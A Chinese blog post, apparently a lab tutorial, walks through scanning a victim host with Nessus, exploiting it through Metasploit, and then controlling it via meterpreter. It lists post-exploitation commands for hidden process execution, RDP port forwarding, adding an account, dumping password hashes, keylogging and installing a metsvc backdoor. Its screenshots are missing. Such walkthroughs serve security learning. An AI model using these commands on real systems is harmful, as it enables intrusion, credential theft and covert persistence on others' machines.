码迷,mamicode.com
首页 > Web开发 > 详细

Nessus+Metasploit

时间:2015-04-28 18:03:25      阅读:216      评论:0      收藏:0      [点我收藏+]

标签:

1、环境

受害者IP:10.0.0.6

2、攻击

首先使用Nessus进行扫描

 技术分享

扫描结果

 技术分享

我们将结果导出来,然后导入msfconsole中

 技术分享

使用vulns进行漏洞分析

 技术分享

技术分享

 

技术分享

查找对应的漏洞

 技术分享

使用漏洞进行攻击

 技术分享

这时候我们就获得了一个meterpreter

3、控制后门

测试是否是虚拟机:

 技术分享

迁移进程,防止当前进程被删除

 技术分享

 技术分享

 技术分享

ps:查看进程

migrate pid:迁移进程

execute –H –i –f cmd.exe:创建新进程,-H不可见,-i交互

getpid:获取进程号

getuid:查看权限

sysinfo:系统信息

端口转发

       portfwd add –l 5678 –p 3389 –r 10.0.0.6:将受害者的3389转发到本机5678

       run getgui –u hack –p hack:添加账户

       rdesktop –u hack –p hack 10.0.0.6:3389:如果转发了就连接本地

 技术分享

获取hash

 技术分享

键盘监听

keyscan_start:启动监听

keyscan_stop:停止

keyscan_dump:查看

 技术分享 

后门一:metsvc

 技术分享

然后使用

 技术分享

我这里失败了,原因是tcp/ip状态为FIN_WAIT_2(跟网络环境有关,如果哪位大牛知道如何解决,请告诉我!)

技术分享

Nessus+Metasploit

标签:

原文地址:http://www.cnblogs.com/BloodZero/p/4463277.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!